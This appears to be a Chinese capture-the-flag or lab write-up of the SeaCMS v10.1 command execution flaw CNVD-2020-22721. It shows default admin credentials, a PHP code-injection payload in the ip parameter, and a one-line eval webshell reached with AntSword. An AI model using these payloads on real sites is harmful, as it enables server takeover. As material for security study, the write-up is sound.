seacms海洋cms漏洞

  • 前言
  • 一、seacms 远程命令执行 (CNVD-2020-22721)
    • 0x01 漏洞描述
    • 0x02 漏洞利用
      • 拿shell
  • 总结

前言

海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。

一、seacms 远程命令执行 (CNVD-2020-22721)

0x01 漏洞描述

SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 后台路径:/manager 后台密码:admin:admin

0x02 漏洞利用

(1)首页如下

访问后台路径 /manager

后台密码 admin admin登录

(2)漏洞利用地址
http://118.193.36.37:21056/manager/admin_ip.php

漏洞存在点 ip参数
poc

(1)  允许 ip 处 输入    ";phpinfo();//   点击确认
(2) 访问 http://118.193.36.37:21056/data/admin/ip.php

写入phpinfo() 代码成功

拿shell

(1) 写入一句话木马
";eval($_POST[123]);//
(2) 蚁剑连接

(3) 连接成功

flag-{bmh5fa859d6-d482-47d0-a1da-83a7be9b66e6}

bp 抓包 修改参数 如下
提交参数

v=0&ip=";eval($_POST[9]);//


总结

seacms海洋cms漏洞相关推荐

  1. php影视管理系统下载,seacms海洋cms影视管理系统 v10.9

    seacms海洋影视管理系统简介 海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分 ...

  2. php影视管理系统下载,GitHub - ganjmeng/SEACMS: 海洋cms 海洋影视管理系统 - 免费开源PHP...

    ===更新日志=== 更新日期:2020年2月8日 v10.1 新增:百度SEO时间格式标签{playpage:addtime2} 新增:后台首页待处理互动信息提示 新增:网站内容信息统计 新增:评论 ...

  3. 记一次海洋cms任意代码执行漏洞拿shell(url一句话)

    实验环境:海洋CMS6.54(后续版本已该洞已补) 1.后台登录尝试 这个站点是个测试站,站里没什么数据. 进入admin.php,是带验证码的后台登录系统,没有验证码的可以用bp爆破.有验证码的也有 ...

  4. WEB漏洞之:海洋CMS代码执行(CNVD-2020-22721)

    漏洞环境说明: 海洋CMS是一款视频类cms,本次复现海洋cms远程命令执行漏洞 漏洞编号:CNVD-2020-22721 首先登录后台地址为//manager 默认用户名和密码admin. 进入后台 ...

  5. 原生php开发cms,海洋cms视频内容管理系统v10.3 原生PHP代码+影视管理系统+视频点播系统+开源CMS...

    源码类型:php源码 源码版本:20.11.4 最后更新:2020年11月4日19:32:28 源码说明: 海洋影视管理系统(seacms,海洋 cms)是一套专为不同需求的站长而设计的视频点播系统, ...

  6. 海洋zyapi.php,海洋cms自带资源发布api插件和第三方资源站接入办法说明

    ===海洋cms自带API资源发布插件说明=== * 资源发布API是指将自己站内资源发布出来,做出资源站,供其他站长采集数据. * 站长可以在后台控制是否开启资源发布API插件. * 资源库API访 ...

  7. 海洋zyapi.php,zyapi.php · 姬晓亮/海洋cms 海洋影视管理系统 - 免费开源PHP - Gitee.com...

    /****************************** 海洋CMS版权所有 www.seacms.org 功能:资源发布zyAPI模块 版本:1.0 开发:海洋 *************** ...

  8. 最新海洋CMS(海洋视频内容管理系统)V12.6版

    正文: 海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯 ...

  9. 海洋cms新手入门安装配置教程

    在安装本系统前,请先确认您的服务器环境是否符合海洋cms环境要求: Windows 平台: IIS/Apache/Nginx + PHP(5.x) + MySQL(5.x) Linux/Unix 平台 ...

  10. 海洋CMS自动采集教程,小白都会操作

    * 针对Liunx,Windows自行扩展. * 无需Python3支持 脚本代码如下: #!/bin/bash ########################################### ...

最新文章

  1. 一、Focal Loss理论及代码实现
  2. 定义一个 圆形 Circle类 , 定义其中的长度length属性,定义一个求面积getArea()的方法。 并编写一个测试类,进行长度的赋值和展示,并调用求面积方法展示面积值。
  3. leetcode 525. Contiguous Array | 525. 连续数组(Java)
  4. JavaScript总结(3)
  5. sprintf用法详解
  6. 高效pycharm使用技巧_您是否正在使用这种高效的采访技巧?
  7. 猜算式,四个两位数字不可以重复
  8. 关键字nullable,nonnull,null_resettable,_Null_unspecified详解
  9. mysql 几何对象,几何(geometry)对象类型
  10. web在session设置的账户用户名显示为空_海蜘蛛路由Web认证怎么设置 海蜘蛛路由Web认证方法【介绍】...
  11. 限时!字节Java程序性能优化宝典开源,原来这才叫性能优化
  12. 60、在Visual Studio 2019 环境下,使用C#调用C++生成的dll实现yolov5的图片检测
  13. 经颅磁刺激对大脑结构的直接影响: cTBS后的短期神经可塑性
  14. 关于HP M125-M126的无线链接方案
  15. java金额大小写转换 数字大小写转换
  16. Thingworx自定义扩展开发(二)- Widget Demo Coding
  17. Scratch软件编程等级考试四级——20210320
  18. HTML5原生WebGL开发系列教程
  19. 前端disable和readonly的区别?
  20. 不同系统之间数据对接方式

热门文章

  1. AUTOSAR接口类型及访问规则
  2. STM32学习(一)—STM32固件库的使用
  3. BUUCTF WEB PIAPIAPIA1
  4. python爬虫岗位招聘_Python爬虫系列2-抓取拉钩网2020年最新互联网岗位招聘信息
  5. 主图指标,原创极强黄点,将军柱和黄金柱都是3日的
  6. 01-css3动画之过渡详解 以及 实战纯css打造手风琴图片特效
  7. 《数字化决策》连载 | 七:探索并建立决策模型(3)
  8. 搞定签到码,一切皆可码!!!微信小程序篇
  9. 模仿6ecc 主页 主体部分(查看附件点击6eccHTML 就会看到如下页面效果)
  10. 闲置电脑挂机赚钱-Traffmonetizer,支持windows,linux,Android,MacOS多平台